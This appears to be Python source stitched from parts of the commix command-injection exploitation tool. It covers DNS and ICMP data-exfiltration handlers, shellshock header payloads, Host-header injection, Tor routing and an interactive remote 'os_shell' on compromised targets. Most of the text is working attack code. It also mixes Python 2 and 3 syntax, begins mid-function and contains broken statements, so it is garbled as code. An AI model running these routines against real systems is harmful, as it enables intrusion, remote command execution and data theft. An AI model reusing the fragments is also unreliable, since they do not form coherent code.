settings.IGNORE_ERR_MSG = True
else:
os._exit(0)
else:
try:
response = urllib2.urlopen(request)
except urllib2.HTTPError, err_msg:
if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR:
response = False
elif settings.IGNORE_ERR_MSG == False:
err = str(err_msg) + "."
print "\n" + settings.print_critical_msg(err)
continue_tests = checks.continue_tests(err_msg)
def dns_exfiltration_handler(url, http_request_method):
# Check injection state
settings.DETECTION_PHASE = True
settings.EXPLOITATION_PHASE = False
# You need to have root privileges to run this script
if os.geteuid() != 0:
err_msg = "You need to have root privileges to run this option."
print("\n" + settings.print_critical_msg(err_msg))
os._exit(0)
if http_request_method == "GET":
#url = parameters.do_GET_check(url)
vuln_parameter = parameters.vuln_GET_param(url)
request = _urllib.request.Request(url)
headers.do_check(request)
else:
parameter = menu.options.data
parameter = _urllib.parse.unquote(parameter)
parameter = parameters.do_POST_check(parameter)
request = _urllib.request.Request(url, parameter)
headers.do_check(request)
vuln_parameter = parameters.vuln_POST_param(parameter, url)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
response = proxy.use_proxy(request)
except _urllib.error.HTTPError as err_msg:
if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR:
response = False
elif settings.IGNORE_ERR_MSG == False:
err = str(err_msg) + "."
print("\n") + settings.print_critical_msg(err)
continue_tests = checks.continue_tests(err_msg)
if continue_tests == True:
settings.IGNORE_ERR_MSG = True
else:
os._exit(0)
# Check if defined Tor.
elif menu.options.tor:
try:
response = tor.use_tor(request)
except _urllib.error.HTTPError as err_msg:
if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR:
response = False
elif settings.IGNORE_ERR_MSG == False:
err = str(err_msg) + "."
print("\n") + settings.print_critical_msg(err)
continue_tests = checks.continue_tests(err_msg)
if continue_tests == True:
settings.IGNORE_ERR_MSG = True
else:
os._exit(0)
else:
try:
response = _urllib.request.urlopen(request)
except _urllib.error.HTTPError as err_msg:
if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR:
response = False
elif settings.IGNORE_ERR_MSG == False:
err = str(err_msg) + "."
print("\n") + settings.print_critical_msg(err)
continue_tests = checks.continue_tests(err_msg)
if continue_tests == True:
settings.IGNORE_ERR_MSG = True
else:
os._exit(0)
if settings.TARGET_OS == "win":
err_msg = "This module's payloads are not suppoted by "
err_msg += "the identified target operating system."
print(settings.print_critical_msg(err_msg) + "\n")
os._exit(0)
else:
dns_server = menu.options.dns_server
technique = "DNS exfiltration module"
info_msg = "Loading the " + technique + ". \n"
sys.stdout.write(settings.print_info_msg(info_msg))
exploitation(dns_server, url, http_request_method, vuln_parameter,
technique)
def icmp_exfiltration_handler(url, http_request_method):
# Check injection state
settings.DETECTION_PHASE = True
settings.EXPLOITATION_PHASE = False
# You need to have administrative privileges to run this module.
if not common.running_as_admin():
err_msg = "You need to have administrative privileges to run this module."
print(settings.print_critical_msg(err_msg) + "\n")
os._exit(0)
if http_request_method != settings.HTTPMETHOD.POST:
#url = parameters.do_GET_check(url, http_request_method)
request = _urllib.request.Request(url)
headers.do_check(request)
vuln_parameter = parameters.vuln_GET_param(url)
else:
parameter = menu.options.data
parameter = _urllib.parse.unquote(parameter)
parameter = parameters.do_POST_check(parameter, http_request_method)
request = _urllib.request.Request(url, parameter)
headers.do_check(request)
vuln_parameter = parameters.vuln_POST_param(parameter, url)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
response = proxy.use_proxy(request)
except _urllib.error.HTTPError as err_msg:
if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR or str(
err_msg.code) == settings.BAD_REQUEST:
response = False
elif settings.IGNORE_ERR_MSG == False:
err = str(err_msg) + "."
print("\n" + settings.print_critical_msg(err))
continue_tests = checks.continue_tests(err_msg)
if continue_tests == True:
settings.IGNORE_ERR_MSG = True
else:
os._exit(0)
# Check if defined Tor.
elif menu.options.tor:
try:
response = tor.use_tor(request)
except _urllib.error.HTTPError as err_msg:
if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR or str(
err_msg.code) == settings.BAD_REQUEST:
response = False
elif settings.IGNORE_ERR_MSG == False:
err = str(err_msg) + "."
print("\n" + settings.print_critical_msg(err))
continue_tests = checks.continue_tests(err_msg)
if continue_tests == True:
settings.IGNORE_ERR_MSG = True
else:
os._exit(0)
else:
try:
response = _urllib.request.urlopen(request,
timeout=settings.TIMEOUT)
except _urllib.error.HTTPError as err_msg:
if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR or str(
err_msg.code) == settings.BAD_REQUEST:
response = False
elif settings.IGNORE_ERR_MSG == False:
err = str(err_msg) + "."
print("\n" + settings.print_critical_msg(err))
continue_tests = checks.continue_tests(err_msg)
if continue_tests == True:
settings.IGNORE_ERR_MSG = True
else:
os._exit(0)
if settings.TARGET_OS == "win":
err_msg = "This module's payloads are not suppoted by "
err_msg += "the identified target operating system."
print(settings.print_critical_msg(err_msg) + "\n")
os._exit(0)
else:
technique = "ICMP exfiltration module"
info_msg = "Loading the " + technique + ". \n"
sys.stdout.write(settings.print_info_msg(info_msg))
sys.stdout.flush()
ip_data = menu.options.ip_icmp_data
# Source IP address
ip_src = re.findall(r"ip_src=(.*),", ip_data)
ip_src = ''.join(ip_src)
# Destination IP address
ip_dst = re.findall(r"ip_dst=(.*)", ip_data)
ip_dst = ''.join(ip_dst)
exploitation(ip_dst, ip_src, url, http_request_method, vuln_parameter,
technique)
def get_request_response(request):
if settings.REVERSE_TCP == False and settings.BIND_TCP == False:
headers.check_http_traffic(request)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
response = proxy.use_proxy(request)
except _urllib.error.HTTPError as err_msg:
if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR:
response = False
elif settings.IGNORE_ERR_MSG == False:
err = str(err_msg) + "."
if not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False or \
settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None:
print("")
if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
print("")
print(settings.print_critical_msg(err))
continue_tests = checks.continue_tests(err_msg)
if continue_tests == True:
settings.IGNORE_ERR_MSG = True
else:
raise SystemExit()
response = False
except _urllib.error.URLError as err_msg:
if "Connection refused" in err_msg.reason:
err_msg = "The target host is not responding. "
err_msg += "Please ensure that is up and try again."
if not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False or \
settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None:
print("")
if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
print("")
print(settings.print_critical_msg(err_msg))
raise SystemExit()
# Check if defined Tor.
elif menu.options.tor:
try:
response = tor.use_tor(request)
except _urllib.error.HTTPError as err_msg:
if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR:
response = False
elif settings.IGNORE_ERR_MSG == False:
err = str(err_msg) + "."
if not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False or \
settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None:
print("")
if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
print("")
print(settings.print_critical_msg(err))
continue_tests = checks.continue_tests(err_msg)
if continue_tests == True:
settings.IGNORE_ERR_MSG = True
else:
raise SystemExit()
response = False
except _urllib.error.URLError as err_msg:
err_msg = str(err_msg.reason).split(" ")[2:]
err_msg = ' '.join(err_msg)+ "."
if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
print("")
print(settings.print_critical_msg(err_msg))
raise SystemExit()
else:
try:
response = _urllib.request.urlopen(request)
except _urllib.error.HTTPError as err_msg:
if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR:
response = False
elif settings.IGNORE_ERR_MSG == False:
if not str(err_msg.code) == str(menu.options.ignore_code):
err = str(err_msg) + "."
# if not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False or \
# settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None:
# print "f"
# elif settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
# print "s"
if settings.VERBOSITY_LEVEL < 2:
print("\r" + settings.print_critical_msg(err) + 30 * " ")
continue_tests = checks.continue_tests(err_msg)
if continue_tests == True:
settings.IGNORE_ERR_MSG = True
else:
raise SystemExit()
response = False
except _urllib.error.URLError as err_msg:
err_msg = str(err_msg.reason).split(" ")[2:]
err_msg = ' '.join(err_msg)+ "."
if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
print("")
print(settings.print_critical_msg(err_msg))
raise SystemExit()
else:
response = headers.check_http_traffic(request)
return response
def shellshock_handler(url, http_request_method, filename):
counter = 1
vp_flag = True
no_result = True
export_injection_info = False
injection_type = "results-based command injection"
technique = "shellshock injection technique"
info_msg = "Testing the " + technique + "... "
if settings.VERBOSITY_LEVEL > 1:
info_msg = info_msg + "\n"
sys.stdout.write(settings.print_info_msg(info_msg))
sys.stdout.flush()
try:
i = 0
total = len(shellshock_cves) * len(headers)
for cve in shellshock_cves:
for check_header in headers:
# Check injection state
settings.DETECTION_PHASE = True
settings.EXPLOITATION_PHASE = False
i = i + 1
attack_vector = "echo " + cve + ":Done;"
payload = shellshock_payloads(cve, attack_vector)
# Check if defined "--verbose" option.
if settings.VERBOSITY_LEVEL == 1:
sys.stdout.write("\n" + settings.print_payload(payload))
elif settings.VERBOSITY_LEVEL > 1:
info_msg = "Generating a payload for injection..."
print settings.print_info_msg(info_msg)
print settings.print_payload(payload)
header = {check_header : payload}
request = urllib2.Request(url, None, header)
if check_header == "User-Agent":
menu.options.agent = payload
else:
menu.options.agent = default_user_agent
log_http_headers.do_check(request)
log_http_headers.check_http_traffic(request)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
response = proxy.use_proxy(request)
# Check if defined Tor.
elif menu.options.tor:
response = tor.use_tor(request)
else:
response = urllib2.urlopen(request)
percent = ((i*100)/total)
float_percent = "{0:.1f}".format(round(((i*100)/(total*1.0)),2))
if str(float_percent) == "100.0":
if no_result == True:
percent = Fore.RED + "FAILED" + Style.RESET_ALL
else:
percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
no_result = False
elif len(response.info()) > 0 and cve in response.info():
percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
no_result = False
elif len(response.read()) > 0 and cve in response.read():
percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
no_result = False
else:
percent = str(float_percent )+ "%"
if not settings.VERBOSITY_LEVEL >= 1:
info_msg = "Testing the " + technique + "... " + "[ " + percent + " ]"
sys.stdout.write("\r" + settings.print_info_msg(info_msg))
sys.stdout.flush()
if no_result == False:
# Check injection state
settings.DETECTION_PHASE = False
settings.EXPLOITATION_PHASE = True
# Print the findings to log file.
if export_injection_info == False:
export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique)
vuln_parameter = "HTTP Header"
the_type = " " + vuln_parameter
check_header = " " + check_header
vp_flag = logs.add_parameter(vp_flag, filename, the_type, check_header, http_request_method, vuln_parameter, payload)
check_header = check_header[1:]
logs.update_payload(filename, counter, payload)
if settings.VERBOSITY_LEVEL >= 1:
checks.total_of_requests()
success_msg = "The (" + check_header + ") '"
success_msg += url + Style.RESET_ALL + Style.BRIGHT
success_msg += "' seems vulnerable via " + technique + "."
if settings.VERBOSITY_LEVEL <= 1:
print ""
print settings.print_success_msg(success_msg)
print settings.SUB_CONTENT_SIGN + "Payload: " + "\"" + payload + "\"" + Style.RESET_ALL
# Enumeration options.
if settings.ENUMERATION_DONE == True :
if settings.VERBOSITY_LEVEL >= 1:
print ""
while True:
if not menu.options.batch:
question_msg = "Do you want to enumerate again? [Y/n] > "
sys.stdout.write(settings.print_question_msg(question_msg))
enumerate_again = sys.stdin.readline().replace("\n","").lower()
else:
enumerate_again = ""
if len(enumerate_again) == 0:
enumerate_again = "y"
if enumerate_again in settings.CHOICE_YES:
enumeration(url, cve, check_header, filename)
break
elif enumerate_again in settings.CHOICE_NO:
break
elif enumerate_again in settings.CHOICE_QUIT:
raise SystemExit()
else:
err_msg = "'" + enumerate_again + "' is not a valid answer."
print settings.print_error_msg(err_msg)
pass
else:
enumeration(url, cve, check_header, filename)
# File access options.
if settings.FILE_ACCESS_DONE == True :
while True:
if not menu.options.batch:
question_msg = "Do you want to access files again? [Y/n] > "
sys.stdout.write(settings.print_question_msg(question_msg))
file_access_again = sys.stdin.readline().replace("\n","").lower()
else:
file_access_again= ""
if len(file_access_again) == 0:
file_access_again = "y"
if file_access_again in settings.CHOICE_YES:
file_access(url, cve, check_header, filename)
break
elif file_access_again in settings.CHOICE_NO:
break
elif file_access_again in settings.CHOICE_QUIT:
raise SystemExit()
else:
err_msg = "'" + file_access_again + "' is not a valid answer."
print settings.print_error_msg(err_msg)
pass
else:
file_access(url, cve, check_header, filename)
if menu.options.os_cmd:
cmd = menu.options.os_cmd
shell, payload = cmd_exec(url, cmd, cve, check_header, filename)
print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL
raise SystemExit()
else:
# Pseudo-Terminal shell
print ""
go_back = False
go_back_again = False
while True:
if go_back == True:
break
if not menu.options.batch:
question_msg = "Do you want a Pseudo-Terminal shell? [Y/n] > "
sys.stdout.write(settings.print_question_msg(question_msg))
gotshell = sys.stdin.readline().replace("\n","").lower()
else:
gotshell= ""
if len(gotshell) == 0:
gotshell= "y"
if gotshell in settings.CHOICE_YES:
if not menu.options.batch:
print ""
print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)"
if readline_error:
checks.no_readline_module()
while True:
try:
if not readline_error:
# Tab compliter
readline.set_completer(menu.tab_completer)
# MacOSX tab compliter
if getattr(readline, '__doc__', '') is not None and 'libedit' in getattr(readline, '__doc__', ''):
readline.parse_and_bind("bind ^I rl_complete")
# Unix tab compliter
else:
readline.parse_and_bind("tab: complete")
cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """)
cmd = checks.escaped_cmd(cmd)
if cmd.lower() in settings.SHELL_OPTIONS:
os_shell_option = checks.check_os_shell_options(cmd.lower(), technique, go_back, no_result)
go_back, go_back_again = check_options(url, cmd, cve, check_header, filename, os_shell_option, http_request_method, go_back, go_back_again)
if go_back:
break
else:
shell, payload = cmd_exec(url, cmd, cve, check_header, filename)
if shell != "":
# Update logs with executed cmds and execution results.
logs.executed_command(filename, cmd, shell)
print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n"
else:
info_msg = "Executing the '" + cmd + "' command... "
if settings.VERBOSITY_LEVEL == 1:
sys.stdout.write(settings.print_info_msg(info_msg))
sys.stdout.flush()
sys.stdout.write("\n" + settings.print_payload(payload)+ "\n")
elif settings.VERBOSITY_LEVEL > 1:
sys.stdout.write(settings.print_info_msg(info_msg))
sys.stdout.flush()
sys.stdout.write("\n" + settings.print_payload(payload)+ "\n")
err_msg = "The '" + cmd + "' command, does not return any output."
print settings.print_critical_msg(err_msg) + "\n"
except KeyboardInterrupt:
raise
except SystemExit:
raise
except EOFError:
err_msg = "Exiting, due to EOFError."
print settings.print_error_msg(err_msg)
raise
except:
info_msg = "Testing the " + technique + "... "
if settings.VERBOSITY_LEVEL > 1:
info_msg = info_msg + "\n"
sys.stdout.write(settings.print_info_msg(info_msg))
sys.stdout.flush()
break
elif gotshell in settings.CHOICE_NO:
if checks.next_attack_vector(technique, go_back) == True:
break
else:
if no_result == True:
return False
else:
return True
elif gotshell in settings.CHOICE_QUIT:
raise SystemExit()
else:
err_msg = "'" + gotshell + "' is not a valid answer."
print settings.print_error_msg(err_msg)
continue
break
else:
continue
if no_result and settings.VERBOSITY_LEVEL < 2:
print ""
except urllib2.HTTPError, err_msg:
if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR:
response = False
elif settings.IGNORE_ERR_MSG == False:
err = str(err_msg) + "."
print "\n" + settings.print_critical_msg(err)
continue_tests = checks.continue_tests(err_msg)
if continue_tests == True:
settings.IGNORE_ERR_MSG = True
else:
raise SystemExit()
def host_injection(url, vuln_parameter, payload):
payload = urlparse(url).netloc + payload
def inject_host(url, vuln_parameter, payload, proxy):
if proxy == None:
opener = urllib2.build_opener()
else:
opener = urllib2.build_opener(proxy)
# Check if defined POST data
if menu.options.data:
menu.options.data = settings.USER_DEFINED_POST_DATA
request = urllib2.Request(url, menu.options.data)
else:
url = parameters.get_url_part(url)
request = urllib2.Request(url)
#Check if defined extra headers.
headers.do_check(request)
payload = checks.newline_fixation(payload)
request.add_header('Host', payload)
try:
headers.check_http_traffic(request)
response = opener.open(request)
return response
except ValueError:
pass
if settings.TIME_RELATIVE_ATTACK :
start = 0
end = 0
start = time.time()
proxy = None
#response = inject_host(url, vuln_parameter, payload, proxy)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
proxy = urllib2.ProxyHandler({settings.SCHEME : menu.options.proxy})
response = inject_host(url, vuln_parameter, payload, proxy)
except urllib2.HTTPError, err_msg:
if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR:
response = False
elif settings.IGNORE_ERR_MSG == False:
err = str(err_msg) + "."
if not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False or \
settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None:
print("")
if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
print("")
print(settings.print_critical_msg(err))
continue_tests = checks.continue_tests(err_msg)
if continue_tests == True:
settings.IGNORE_ERR_MSG = True
else:
raise SystemExit()
response = False
except urllib2.URLError, err_msg:
err_msg = str(err_msg.reason).split(" ")[2:]
err_msg = ' '.join(err_msg)+ "."
if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
print("")
print(settings.print_critical_msg(err_msg))
raise SystemExit()
